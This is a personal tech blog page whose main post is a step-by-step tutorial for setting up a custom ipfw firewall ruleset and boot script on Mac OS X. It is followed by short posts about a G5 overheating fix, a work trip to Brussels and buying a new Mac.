One of the most important things to remember though is the fact that a firewall is not the be-all-end-all security measure that fixes all of your problems. The software serving the protocols that you do allow through the firewall could still be buggy or riddled with security flaws. Think of Microsoft's IIS webserver software, which was famous for its security holes in the past.

OS X! What's the problem?

As I said it was only recently that I found the need to manually configure OS X's built in firewall software. I'd always kind of expected the software to work straight out of the box, which it kind of did.

You see, usually with firewall software you'll say "I want to block any and all traffic to and from my box, except this, this and that protocol". Basically you do the same with OS X's firewall, but with a small snake in the grass: the protocols you allow to go in and out of your systems get permission on all of your network interfaces! So if you're hooked up onto the Internet (which I assume since you found my little article) and if you decide to turn on that Windows file sharing, remember that you're sharing your files with the rest of the Internet! You can imagine I was less than pleased with this and I can't even begin to imagine why it took me two months to start thinking about this. Usually I'm more security minded! Anywho, the damage was done and I decided to quickly learn enough about the OS X firewall, so I could configure it properly.

Reconfiguring the OS X firewall

I quickly found out that OS X uses ipfw, the default BSD UNIX firewall, which can be configured in many different ways. There's Apple's custom pane in System Preferences. Then there are GUIs like Brickhouse and Firewalker which are available through the Internet. And finally you can take the manual approach and enter ipfw firewall rules one by one, by hand.

I chose to use the manual approach, since that is what I'm most familiar with; I've been entering firewall rules since my internship at Spherion, when I was still running a firewall on Suse Linux 6.0. An added bonus to entering the rules by hand is that you know with 100% certainty what the firewall will do, as opposed to rules created or generated by a GUI.

I wouldn't expect Joe and Little Timmy from across the street to use this approach, so I would recommend that people who're less technically inclined give software like Brickhouse a try. I hear it's supposed to be pretty good!

For the lazy people...

People who don't like typing big files by hand can download the file Firewall-config.tar from my website. This file contains all files which are to be placed in /Library/StartupItems/Firewall.
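If you go that route, unpacking it would look something like this (I'm assuming here that you saved the archive to your desktop and that you have already created the /Library/StartupItems/Firewall directory as described in the next section):

kilala:~ thomas$ cd /Library/StartupItems/Firewall
kilala:~ thomas$ sudo tar -xvf ~/Desktop/Firewall-config.tar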

First things first

In a minute we'll start looking at how we create rules for our firewall. But as the title says: "First things first"! Because we want our own set of rules to bypass the OS X default rules, we'll need to make sure that our configuration gets loaded right after the system comes up. This is done by adding a new boot configuration for the firewall. I'll just show you all the steps I took, along with some explanations; that should make things clear enough.

First off, make sure that you're in a user account which is allowed to use the sudo command. This could be the Administrator account, but you could also modify your own account for this purpose. Then open up a Terminal.app window.

Last login: Sun Apr 4 09:46:44 on ttyp1
Welcome to Darwin!
kilala:~ thomas$ cd /Library
kilala:~ thomas$ sudo mkdir -p StartupItems/Firewall
Password:
kilala:~ thomas$ sudo chown -R root:wheel StartupItems
kilala:~ thomas$ sudo chmod -R 755 StartupItems
kilala:~ thomas$ cd StartupItems/Firewall
kilala:~ thomas$ sudo cp -rp /System/Library/StartupItems/NFS/* .

The previous commands created a new boot configuration directory for the service we will call Firewall. You set up the directories to have the proper ownerships and access permissions. Finally, you copied over the startup configuration of the service called NFS as a basis for our own service.

Now I'm hoping that you are already familiar with the vi text editor, because we are going to make heavy use of it. If you have no clue how to use vi, please look up some tips on the Internet first!

kilala:~ thomas$ sudo vi StartupParameters.list

Modify the file to read as follows:

{
    Description     = "Firewall";
    Provides        = ("Firewall");
    Requires        = ("Resolver", "NetworkExtensions");
    OrderPreference = "Late";
    Messages =
    {
        start = "Starting custom firewall";
        stop  = "Stopping custom firewall";
    };
}

kilala:~ thomas$ sudo mv NFS Firewall
kilala:~ thomas$ sudo vi Firewall

Modify the file to read as follows:

#!/bin/sh

##
# Setting up the Firewall rules at boot time
##
# Please note: added "FIREWALL=-YES-" entry to /etc/hostconfig

. /etc/rc.common

StartService ()
{
    if [ "${FIREWALL:=-NO-}" = "-YES-" ]; then
        ConsoleMessage "Adding Firewall Rules"
        ipfw -f flush
        exec /Library/StartupItems/Firewall/Ruleset
    fi
}

StopService ()
{
    ConsoleMessage "Removing all Firewall Rules"
    ipfw -f flush
}

RestartService ()
{
    ConsoleMessage "Removing all Firewall Rules"
    ipfw -f flush
    if [ "${FIREWALL:=-NO-}" = "-YES-" ]; then
        ConsoleMessage "Adding Firewall Rules"
        ipfw -f flush
        exec /Library/StartupItems/Firewall/Ruleset
    fi
}

RunService "$1"

We're almost there :) Only one more file to edit to set up the automatic booting.

kilala:~ thomas$ sudo vi /etc/hostconfig

Modify the file by adding the following line at the bottom:

FIREWALL=-YES-
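You can quickly check whether that line made it in there:

kilala:~ thomas$ grep FIREWALL /etc/hostconfig
FIREWALL=-YES-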

Before setting up the rules

Now we'll get to the brunt of setting up our firewall. Most of the things discussed in this document are things that I had to learn in the course of a day, so please don't expect me to explain everything in detail ^_^; I was lucky enough to have enough past experience with iptables and ipchains, so that helped me in understanding the rules in the following chapter.

Unfortunately the rules below will only apply to people who have one network card in their system and who use a dial-up connection to the Internet. In my system the primary network card, which is used for my home network, is designated as en0. My Internet connection on the other hand is designated as ppp0. You can check your own settings by running the following command while you're connected to the Internet:

kilala:~ thomas$ ifconfig -a | grep UP
lo0: flags=8049&lt;UP,LOOPBACK,RUNNING,MULTICAST&gt; mtu 16384
en0: flags=8863&lt;UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST&gt; mtu 1500
ppp0: flags=8051&lt;UP,POINTOPOINT,RUNNING,MULTICAST&gt; mtu 1500

The interface lo0 is your loopback interface, which is a virtual network interface not actively used on the network itself. It is mainly used for communications within your system itself. You can recognise your network card by running the command ifconfig for each of the remaining interfaces (for instance ifconfig en0); your network card will have the IP address which is also set in the System Preferences pane.
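For instance, running that command on my own network card gives output along these lines (trimmed a little, and the address shown is of course specific to my home network):

kilala:~ thomas$ ifconfig en0
en0: flags=8863&lt;UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST&gt; mtu 1500
        inet 192.168.0.10 netmask 0xffffff00 broadcast 192.168.0.255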

My whole point is that, if you do not have the exact same situation as I have, you will have to modify the rules below by exchanging each instance of "en0" with the name of your network card and each instance of "ppp0" with the name of your Internet connection. Also, if you have more than one network card, be sure to add additional rules for those interfaces as well.
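If you would rather not do all of that searching and replacing throughout the ruleset, one optional trick (this is just a suggestion on my part, the ruleset below simply uses the literal interface names) is to define the two names as shell variables at the top of the Ruleset script and refer to those in every rule:

#!/bin/sh
# Optional: name the interfaces once at the top of the Ruleset...
INSIDE_IF="en0"    # your network card
OUTSIDE_IF="ppp0"  # your Internet connection

# ...and use the variables in the rules, for example:
ipfw add allow ip from 192.168.0.0/24 to any in recv ${INSIDE_IF}
ipfw add allow tcp from any 1024-65535 to any 80 out xmit ${OUTSIDE_IF}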

Anyway. On with the show!

Almost there: entering the rules

Now you'll have to edit the final file in this whole setup. Make sure that you're still in the /Library/StartupItems/Firewall directory before going on.

kilala:~ thomas$ sudo vi Ruleset

This will also create a new file, which you will have to fill out completely as shown below. Once you're more familiar with how these rules work you could start adding rules for additional services yourself (you'll find a small example of that right after the ruleset). You may notice for example that I don't open up ports for IRC or AIM, since those are both services that I make no use of.

#!/bin/sh
# Firewall ruleset for T. Sluyter (Kilala.valhalla.org)
# Ver 1.00 3rd of April 2004
#
# Allows any and all network traffic on the "inside" network.
# Blocks almost all network traffic to and from the internet.
# Allows only a limited amount of network traffic to and from the internet.
#

# Allow a number of default traffic types
ipfw add allow ip from any to any via lo0
ipfw add allow tcp from any to any established
ipfw add allow ip from any to any frag
ipfw add allow icmp from any to any icmptype 3,4,11,12
ipfw add deny log ip from 127.0.0.0/8 to any in
ipfw add deny log ip from any to 127.0.0.0/8 in
ipfw add deny log ip from 224.0.0.0/3 to any in
ipfw add deny log tcp from any to 224.0.0.0/3 in

# Allow any and all traffic coming through en0, from local network
ipfw add allow ip from 192.168.0.0/24 to any in recv en0
ipfw add allow ip from any to 192.168.0.0/24 out xmit en0
ipfw add allow tcp from 192.168.0.0/24 to any in recv en0
ipfw add allow tcp from any to 192.168.0.0/24 out xmit en0
ipfw add allow udp from 192.168.0.0/24 to any in recv en0
ipfw add allow udp from any to 192.168.0.0/24 out xmit en0
ipfw add allow icmp from any to any in recv en0
ipfw add allow icmp from any to any out xmit en0

# Allow FTP (File transfer) to the outside
ipfw add allow tcp from any 1024-65535 to any 20-21 out xmit ppp0
ipfw add allow tcp from any 20-21 to any 1024-65535 in recv ppp0

# Allow DNS lookups to outside
ipfw add allow udp from any 1024-65535 to any 53 out xmit ppp0
ipfw add allow udp from any 53 to any 1024-65535 in recv ppp0

# Allow SSH (Secure shell) to outside
ipfw add allow tcp from any 1024-65535 to any 22 out xmit ppp0
ipfw add allow tcp from any 22 to any 1024-65535 in recv ppp0

# Allow HTTP (Web browsing) to outside
ipfw add allow tcp from any 1024-65535 to any 80 out xmit ppp0
ipfw add allow tcp from any 80 to any 1024-65535 in recv ppp0
ipfw add allow tcp from any 1024-65535 to any 8080 out xmit ppp0
ipfw add allow tcp from any 8080 to any 1024-65535 in recv ppp0

# Allow HTTPS (Secure web browsing) to outside
ipfw add allow tcp from any 1024-65535 to any 443 out xmit ppp0
ipfw add allow tcp from any 443 to any 1024-65535 in recv ppp0

# Allow POP (Retrieving e-mail) to outside
ipfw add allow tcp from any 1024-65535 to any 110 out xmit ppp0
ipfw add allow tcp from any 110 to any 1024-65535 in recv ppp0

# Allow SMTP (Sending e-mail) to outside
ipfw add allow tcp from any 1024-65535 to any 25 out xmit ppp0
ipfw add allow tcp from any 25 to any 1024-65535 in recv ppp0

# Allow ICMP to and from outside
ipfw add allow icmp from any to any in recv ppp0
ipfw add allow icmp from any to any out xmit ppp0

# Block all of the rest, along with logging
ipfw add deny log tcp from any to any in recv ppp0
ipfw add deny log udp from any to any in recv ppp0
ipfw add deny log ip from any to any in recv ppp0
ipfw add deny log tcp from any to any out xmit ppp0
ipfw add deny log udp from any to any out xmit ppp0
ipfw add deny log ip from any to any out xmit ppp0
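As a small example of adding a rule pair for another service (this one is not part of the ruleset above, it's purely an illustration of the pattern), allowing IMAP for retrieving e-mail would look like this:

# Allow IMAP (Retrieving e-mail) to outside
ipfw add allow tcp from any 1024-65535 to any 143 out xmit ppp0
ipfw add allow tcp from any 143 to any 1024-65535 in recv ppp0

Do keep in mind that every rule you add changes the rule count mentioned in the next section.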

Finishing touches

Before we start rebooting our systems it might be wise to first check if our startup scripts are in full working order. You never know what happens if things aren't written a hundred percent correctly ;)

Luckily Apple has provided us with a command which can be used to run a startup script as if the system was rebooting just now. Running the following command should give you a properly configured firewall.

kilala:~ thomas$ sudo SystemStarter start Firewall

Now don't worry if running this command gives you loads of errors about the ppp0 interface not being available. This is of course normal if you're starting the firewall without being connected to the Internet. Like I said: don't worry! The firewall will work properly. You may check whether the firewall rules are properly loaded by running:

kilala:~ thomas$ sudo ipfw list

This command should return a list of 41 rules if you followed my example to the letter. You can count them by running sudo ipfw list | wc -l. If all of this seems to work properly, you should reboot your system. Once it's restarted, run the ipfw list command again to see if the firewall came up properly.
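One final, somewhat hedged, tip: if I remember correctly the 'log' keyword in the deny rules only actually produces messages in /var/log/system.log when the kernel's verbose firewall logging is switched on. If you find that blocked packets are not being logged, you could try enabling it like this (your mileage may vary between OS X versions):

kilala:~ thomas$ sudo sysctl -w net.inet.ip.fw.verbose=1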

And that's about it! ^_^ Congratulate yourself on a job well done and rest assured that you're surfing the web a little bit safer.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Overheating Powermac G5

2004-03-28 08:12:00

Well, Apple has finally gotten rid of the overheating hard disk problems. Unfortunately they did not choose to relocate the thermal sensors for free, but instead issued an update for Fan Control, which apparently is part of OS X. Jaguar users can download this patch separately from Apple's Support pages, while Panther users get this update as part of the 'jumbo patch' 10.3.3.


kilala.nl tags: , ,

View or add comments (curr. 0)

Travelling to Brussels, teaching a course

2004-02-10 08:01:00

Ah! This feels so incredibly good! ^_^

Today I'm travelling to Brussels, instead of heading off to the office like any other day, to give a short course to our IT colleagues over there. We're busy on a very exciting (and tiring) project which involves migrating hundreds of servers from London, over to the EU mainland. These servers will be placed within domains which involve a certain piece of security software that we use at $CLIENT, and the course I'm about to give covers just that!

Anyway. Not to delve too much into our company politics :) The reason I'm feeling so well this morning (it's about 8:30 now) is because I get to take the Thalys train into Brussels! This involves getting up at five in the morning, riding a luxury cab to Schiphol airport and then getting on the train around 7:15. $CLIENT even sprang for a first class ticket for me! So that means that I get to sit in a _very_ comfy seat, while working on the company's laptop and getting pampered by two lovely ladies. Don't you just _love_ a good, free breakfast?!

Speaking of pampering: I just booked a cab ride in Brussels _from_ the train! ^_^ This is so weird! I just can't help feeling giddy with excitement. (Gee Cailin! I guess you don't get around much, do you?!)

And speaking of laptops: right now I'm working on this HP Omnibook I borrowed from the company. It's running NT4, so it's both slow and unstable : ( But my experiences during the last two weeks have led me to decide that I seriously want a laptop of my own. Preferably an iBook of course! It's unbelievable how bloody useful these contraptions are and how much work I can get done with them while on the road!

Aniway, I'd better get back to work now! I'll be arriving at Brussels around 9:30, so I'd better review my course material one more time *shudder*

Cheers!


kilala.nl tags: , , ,

View or add comments (curr. 0)

My switch to Apple and other updates

2003-11-11 21:32:00

Another day, another update :)

Last week I went out and bought my lovely Apple G5 tower... It's the basic single 1.6 GHz processor model and I've gone for all of the vanilla options. Later on, when/if I get more money, I'll upgrade the RAM with 512 MB extra and I'll add a second S-ATA hard drive for all of our home videos (which as of yet we still have to start making :P).

Anyway: I'm quite pleased with the computer! It simply oozes sex and the OS, while it takes getting used to, is quite pleasant in daily use. Right now I'm waiting for my back order on Final Cut Express (w00t on the €250+ discount when buying an Apple) and on OS X 10.3 (aka Panther). The only thing missing right now is the GIMP, which is my favourite imaging tool. For all of you fellow amateurs out there who'd like a cheap/free alternative to Photoshop, check out http://www.gimp.org.

Work's still interesting/fun, although quite busy: currently I'm juggling about seven projects, trying to spread them all out evenly over my four-day work week (don't you just love working at a bank?!) which is quite a hassle, since oftentimes people'll jump in with extra work that needs to be done yesterday. Anyway, even though I may sometimes complain or bitch a little, I'm still quite happy at ${Customer}. ^_^

On a final note, about two weeks ago Marli and I visited 'het Spellen Spektakel', which is the Netherlands' largest gaming fair. Once a year the city of Eindhoven is flooded by kids, parents and gaming geeks who all trudge into the trade show building. Now, when I say "game" in this case I mean "board games" and "table top games" etc. We bought a _lot_ of stuff over there (among others over five booster displays for the Harry Potter CCG and two displays of Card Captor Sakura CCG), but overall we found the show to be a bit boring so we left quite early.

The two days after buying my new computer were filled with ups and downs, making for a couple of very hectic days with mood swings that quite contrasted with each other. Not too good as you can imagine -_-' Anyway: check out the comic!

As you can see I've switched to another form of layout and story telling. I'm still getting used to it and might switch back to my original form in the future, but right now I'm quite pleased with how much this layout lets me tell. :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

Older blog posts